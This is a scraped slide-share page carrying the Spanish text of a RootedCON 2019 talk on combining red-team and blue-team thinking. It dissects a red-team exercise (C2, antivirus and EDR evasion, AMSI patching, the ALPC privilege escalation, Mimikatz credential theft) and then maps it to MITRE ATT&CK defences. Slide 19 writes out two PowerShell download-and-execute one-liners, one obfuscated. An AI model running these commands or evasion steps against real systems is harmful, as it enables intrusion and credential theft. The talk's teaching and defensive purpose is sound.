Rooted2020 dev secops-into_the_unknown_-_jesus_alcalde_-_daniel_gonzalezRooted2020 dev secops-into_the_unknown_-_jesus_alcalde_-_daniel_gonzalez
Rooted2020 dev secops-into_the_unknown_-_jesus_alcalde_-_daniel_gonzalez
RootedCON
 
Rooted2020 atacando la-debilidad_humana_-_ruth_sala_-_carmen_torrano
Rooted2020 atacando la-debilidad_humana_-_ruth_sala_-_carmen_torranoRooted2020 atacando la-debilidad_humana_-_ruth_sala_-_carmen_torrano
Rooted2020 atacando la-debilidad_humana_-_ruth_sala_-_carmen_torrano
RootedCON
 

Más de RootedCON (20)

Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
 
Rooted2020 el camino-de_hacktiago_tras_los_pasos_de_14_increibles_cibersantua...
Rooted2020 el camino-de_hacktiago_tras_los_pasos_de_14_increibles_cibersantua...Rooted2020 el camino-de_hacktiago_tras_los_pasos_de_14_increibles_cibersantua...
Rooted2020 el camino-de_hacktiago_tras_los_pasos_de_14_increibles_cibersantua...
 
Rooted2020 dev secops-into_the_unknown_-_jesus_alcalde_-_daniel_gonzalez
Rooted2020 dev secops-into_the_unknown_-_jesus_alcalde_-_daniel_gonzalezRooted2020 dev secops-into_the_unknown_-_jesus_alcalde_-_daniel_gonzalez
Rooted2020 dev secops-into_the_unknown_-_jesus_alcalde_-_daniel_gonzalez
 
Rooted2020 atacando la-debilidad_humana_-_ruth_sala_-_carmen_torrano
Rooted2020 atacando la-debilidad_humana_-_ruth_sala_-_carmen_torranoRooted2020 atacando la-debilidad_humana_-_ruth_sala_-_carmen_torrano
Rooted2020 atacando la-debilidad_humana_-_ruth_sala_-_carmen_torrano
 

Último

Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
espinozaernesto427
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
zoecaicedosalazar
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
marianabz2403
 
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
CesarPazosQuispe
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
Emilio Casbas
 
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
DanielErazoMedina
 
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Telefónica
 
Conceptos básicos de programación 10-5.pdf
Conceptos básicos de programación 10-5.pdfConceptos básicos de programación 10-5.pdf
Conceptos básicos de programación 10-5.pdf
ValeriaAyala48
 
Ventajas y desventajas de la desinfección con cloro
Ventajas y desventajas de la desinfección con cloroVentajas y desventajas de la desinfección con cloro
Ventajas y desventajas de la desinfección con cloro
durangense277
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
SamuelRamirez83524
 
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdfEstructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
IsabellaRubio6
 
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
vazquezgarciajesusma
 
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
sarasofiamontezuma
 
Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.
AlejandraCasallas7
 
biogas industrial para guiarse en proyectos
biogas industrial para guiarse en proyectosbiogas industrial para guiarse en proyectos
biogas industrial para guiarse en proyectos
Luis Enrique Zafra Haro
 
Conceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación ProyectoConceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación Proyecto
cofferub
 
Desarrollo de Habilidades de Pensamiento.docx (3).pdf
Desarrollo de Habilidades de Pensamiento.docx (3).pdfDesarrollo de Habilidades de Pensamiento.docx (3).pdf
Desarrollo de Habilidades de Pensamiento.docx (3).pdf
AlejandraCasallas7
 
Conceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. TecnologíaConceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. Tecnología
coloradxmaria
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
thomasdcroz38
 
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdfTrabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
cj3806354
 

Último (20)

Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
Semana 10_MATRIZ IPER_UPN_ADM_03.06.2024
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
 
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
 
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...
 
Conceptos básicos de programación 10-5.pdf
Conceptos básicos de programación 10-5.pdfConceptos básicos de programación 10-5.pdf
Conceptos básicos de programación 10-5.pdf
 
Ventajas y desventajas de la desinfección con cloro
Ventajas y desventajas de la desinfección con cloroVentajas y desventajas de la desinfección con cloro
Ventajas y desventajas de la desinfección con cloro
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
 
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdfEstructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
 
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
 
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.
 
biogas industrial para guiarse en proyectos
biogas industrial para guiarse en proyectosbiogas industrial para guiarse en proyectos
biogas industrial para guiarse en proyectos
 
Conceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación ProyectoConceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación Proyecto
 
Desarrollo de Habilidades de Pensamiento.docx (3).pdf
Desarrollo de Habilidades de Pensamiento.docx (3).pdfDesarrollo de Habilidades de Pensamiento.docx (3).pdf
Desarrollo de Habilidades de Pensamiento.docx (3).pdf
 
Conceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. TecnologíaConceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. Tecnología
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdfTrabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
 

Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]

  • 1. Purple brain, purple brain... Un enfoque global de la gestión de riesgos Red Team & Blue Team Abraham Pasamar & Carlos Fernández
  • 2. Who are we? ● Abraham Pasamar ● Ingeniero y Master en Ciberseguridad ● CEO INCIDE (DFIR & SEC. ASSESSMENT) ● +14 años de experiencia en infosec (...o lo que viene siendo: un abuelete) 2 ● Carlos Fernández ● Ingeniero de Telecos y OSCP ● Coordinador técnico de SEC. ASSESSMENT en INCIDE ● 87% cafeína
  • 4. Equipo Rojo y Equipo Azul 4
  • 5. Mentalidad dual: Purple Brain 5 ● RED TEAM por si mismo no aporta valor a la empresa que contrata. Debe orientarse a mejorar la SEGURIDAD ● BLUE TEAM no orientado a AMENAZAS e IMPACTO no es efectivo
  • 6. Confianza excesiva en los vendors 6 TRUST
  • 7. Disección de un ejercicio de Red Team 7
  • 10. 3 El vector de infección 10 1 C&C ORGANIZACIÓN 2 1 EVASIÓN PERIMETRO 2 EVASIÓN LOCAL 3 EVASIÓN PERIMETRO
  • 11. Laboratorio: Canal de C&C 11 Proxy Víctima HTTPS C&C Switch Inspección Tráfico HTTPS HTTPS Inspección SSL Overlay encryption IDS/IPS TLS Domain hunting Valid SSL Cert Allowed connection
  • 12. 3 El vector de infección 12 1 C&C ORGANIZACIÓN 2 1 EVASIÓN PERIMETRO 2 EVASIÓN LOCAL 3 EVASIÓN PERIMETRO3 EVASIÓN PERIMETRO
  • 13. Laboratorio: Ejecución y evasión de AV LOLBINS API ABUSE FILE-LESS OBFUSCATIONPOWERSHELL SCRIPTING AV vs EDR 13
  • 14. Demo: Shellcode cifrado + Regasm (LOLBIN) 14 RegAsm.exe DLL Maliciosa Carga Descifra y ejecuta Shellcode conocido DEMO
  • 15. Demo: File-less AMSI Patch 15 ¿Qué es la AMSI?
  • 16. Demo: File-less AMSI Patch 16 C2 Server DownloadString1 Invoke-Expression2 AMSI Patch3 DownloadString (Script malicioso conocido) 4 Invoke-Expression5 Inyección de shellcode en otro proceso 6 DEMO
  • 17. Laboratorio: Ejecución y evasión de EDR 17
  • 18. Laboratorio: Ejecución y evasión de EDR 18 EDR EDR 1. 2. + ????
  • 19. Laboratorio: Ejecución y evasión de EDR 19 EDR EDR powershell -c "$wc = (New-Object Net.WebClient); $wc.Proxy.Credentials=[Net.CredentialCache]::De faultNetworkCredentials; $wc.downloadstring('http://rootedcorn.com/main.js ') | iex” powershell -c "echo ('`$wc = (New-Object Net.W'+'ebClient); `$wc.Proxy.Credentials=[Net.CredentialCache]::D efaultNetworkCredentials; `$wc.downloadstring(''https://rootedcorn.com/main .js'') | iex) | iex"
  • 20. 3 El vector de infección 20 1 C&C ORGANIZACIÓN 2 1 EVASIÓN PERIMETRO 2 EVASIÓN LOCAL 3 EVASIÓN PERIMETRO 2 EVASIÓN LOCAL
  • 22. 3 El vector de infección 22 1 C&C ORGANIZACIÓN 2 1 EVASIÓN PERIMETRO 2 EVASIÓN LOCAL 3 EVASIÓN PERIMETRO
  • 23. Laboratorio: Hacer llegar el launcher 23 Adjuntos Dominios Descargas (inspección SSL)
  • 24. Laboratorio: Hacer llegar el launcher 24 Spearphishing link Domain Hunting Cats
  • 25. Laboratorio: Cat Gallery Demo 25 DEMO
  • 26. Cómo se ha ejecutado el malware? 26 Pistas
  • 28. 3 El vector de infección 28 1 C&C ORGANIZACIÓN 2 1 EVASIÓN PERIMETRO 2 EVASIÓN LOCAL 3 EVASIÓN PERIMETRO 1 EVASIÓN PERIMETRO
  • 34. Elevación de privilegios local Advanced Local Procedure Call (ALPC) Local Privilege Escalation Publicada el 28/08/2018 en Twitter por @SandboxEscaper 34 SchRpcSetSecurity Task Scheduler comprueba Fichero .job C:WindowsTasks Asigna una DACL (permisos), como SYSTEM.
  • 35. Elevación de privilegios local 35 Fichero .jobC:WindowsTasks Mecánica del exploit: Hard Link Fichero cualquiera Modificada por payload arbitrario en formato .dll Se modifica la DACL de este fichero, otorgándonos permiso de escritura! Fichero .job printconfig.dll PoC publicada: Hard Link Cargada por spoolsv.exe (SYSTEM)
  • 36. Elevación de privilegios local Solución: Listar tareas programadas Seleccionar .exe no crítico que se ejecute como SYSTEM Modificar, descargar y ejecutar exploit ... Problema: La DLL estaba cargada y no la podíamos sobreescribir aunque tuviéramos permisos! 36
  • 37. Elevación de privilegios local Antes del exploit: Después del exploit: 37
  • 38. Elevación de privilegios local Seguimos.... Sobreescribimos el ejecutable con nuestro payload Esperamos a que ejecute la tarea programada como SYSTEM Obtenemos un proceso elevado, controlado por nosotros 38
  • 40. Reconocimiento para movimiento lateral 40 Victim SGES1001 Windows Server 2008 R2 SP1 Queremos sus credenciales RDP Bob Sesión iniciada Pertenece a Administradores de dominio
  • 41. Acceso a credenciales para elevación en dominio 41 Victim 1. Conexión RDP enrutada a través del canal de C2 SGES1001 2. Listado de parches: KB2871997 instalado 3. Clave de registro HKEY_LOCAL_MACHINESystem CurrentControlSetControlSecurity ProvidersWDigest sin definir → Credenciales en claro en memoria 4. Repetimos la elevación de privilegios 5. Invoke- Mimikatz retocado para evadir la detección 6. Obtenemos las credenciales de Bob
  • 42. Ejecución de movimiento lateral privilegiado 42 RDP WMI WinRMCredenciales de Bob
  • 43. 43 Finalizado el ejercicio de Red Team ¿Y ahora qué?
  • 44. Ejercicio de Red Team: Perspectiva azul Una vez acabado, es hora de mirar a las acciones realizadas desde la perspectiva defensiva. 44
  • 45. Disección del ejercicio: Técnicas adversariales 45 Mitre ATT&CTM Matrix
  • 49. Ejemplo: Powershell (T1086) 49 ●Bloqueo ● ¿Se puede mitigar la ejecución de la técnica? ● Seguramente no es posible deshabilitar o bloquear powershell y el bloqueo es bypasseable ● Logs >v5 ● Logs logs que contienen los comandos de PowerShell no están habilitados por defecto: ● Script Block Logging ● V2 no logea, deshabilitar v2 para evitar ataques downgrade
  • 50. Ejemplo: Powershell (T1086) 50 ●Monitorización ● Recopilar, centralizar, establecer alertas ● ¿Usuario de marketing ejecutando PS? ● Comandos ejecutados en horas no previstas ● Patrones sospechosos, etc
  • 51. Ejemplo: Powershell (T1086) 51 ●Trazabilidad ● Logs centralizados ● Logs locales + extensos ● Asegurar volumen suficiente para evitar rotación rápida
  • 52. 52 ● Mentalidad de vigilancia constante ● Proactivos y apasionados, buscad alertas creativas ● Haceos vuestros propios scripts ● Empezad por mirarlo localmente en maquina de pruebas o usad una centralización de unas cuantas máquinas para probarlo ● Windows event collector ● Agentes: osquery, grr, f-response Mentalidad blue
  • 53. Conclusiones PURPLE TEAM (MENTALIDAD PURPLE): LA FUSION DE AMBOS MUNDOS APORTA MUCHO VALOR RED TEAM Por si mismo no es efectivo Debe orientarse a mejorar la SEGURIDAD BLUE TEAM Si no está orientado a AMENAZAS e IMPACTO no es efectivo Debes poner a prueba el sistema de defensa con ejercicios de ataque 53
  • 54. 54 ● A todo el equipo INCIDE ● Mención especial a SARA RUIZ, responsable del departamento de auditoría ● A todos los investigadores que comparten sus trabajos ● A la organización RootedCON, tanto staff como voluntarios ● Y a todos vosotros por vuestra atención Agradecimientos